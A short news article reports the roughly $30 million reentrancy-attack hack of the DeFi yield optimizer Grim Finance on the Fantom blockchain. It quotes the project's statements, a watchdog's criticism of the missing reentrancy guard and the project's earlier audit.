By Jeff Benson
In brief
What, did you expect something named "Grim" to deliver good news?
Grim Finance, a DeFi protocol, was hacked for $30 million worth of tokens Saturday, it confirmed, in an "advanced attack." According to a tweet from the project, "The exploit was found in the vault contract so all of the vaults and deposited funds are currently at risk."
Grim calls itself a "compounding yield optimizer," meaning it promises to wring extra value from liquidity provider tokens that users receive from decentralized exchanges if they lock them up in a Grim vault. Grim touts in its protocol documentation, "Helping users reap more rewards, hassle-free."
The protocol is built atop the Fantom Opera blockchain, a smart contract-enabled platform that is built using the Solidity language and is compatible with Ethereum. The hacker used a reentrancy attack, which is an exploit that allows someone to fake additional deposits into a vault while an initial transaction is still going, thereby tricking the protocol.
"We have contacted and notified Circle (USDC), DAI, and AnySwap regarding the attacker address to potentially freeze any further fund transfers," Grim tweeted, but the attacker has already been busy laundering the ill-gotten funds through stablecoin transfers.
Rugdoc.io, a DeFi watchdog group of smart contract auditors and investors, says Grim Finance should have known better and used a reentrancy guard.
"Hopefully all projects can draw lessons from this incident that there is much knowledge most experienced solidity devs have at hand," it tweeted. "If you haven't acquired this yet, don't build multi-million dollar projects. Don't get audits from companies which everyone knows are useless."
Grim shared an audit of its finance token and vault contracts from Solidity Finance. According to Solidity Finance's report, "ReentrancyGuard is used in relevant locations to preent [sic] reentrancy attacks."
As of Sunday afternoon, all deposits into Grim Finance vaults remain paused to prevent further theft.